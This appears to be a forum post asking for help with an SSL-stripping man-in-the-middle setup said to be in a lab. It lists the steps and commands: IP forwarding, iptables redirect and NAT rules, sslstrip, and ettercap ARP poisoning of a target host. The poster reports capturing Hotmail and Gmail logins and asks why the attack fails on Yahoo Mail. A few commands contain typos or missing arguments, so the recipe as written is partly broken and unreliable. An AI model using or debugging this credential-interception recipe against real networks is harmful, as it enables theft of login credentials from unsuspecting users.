Greetings ,

I'm conducting test in my lab for ssl sniffing ,

Tools :

SslStrip
ettercap


Steps:

vim /etc/sysctl.conf

removed hash from this line and added 1 ==> net.ipv4.ip_forward=1

saved the file .

iptables -t -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

iptables -A FORWARD -j ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j SNAT --to x.x.x.x <= wan ip

ssltrip -k -p -l 10000

ettercap -i eth1 -Tq -M arp /192.168.2.3/ // // -P autoadd

Now ive tested hotmail thats work fine although gmail as well , but only issue with mail.yahoo.com.

As I loged in from my (target)client after clickin on signin I see a blank page and header of that page is Bad Request no error code or such . Any idea what am I doing wrong here.

Regards
Scorpoin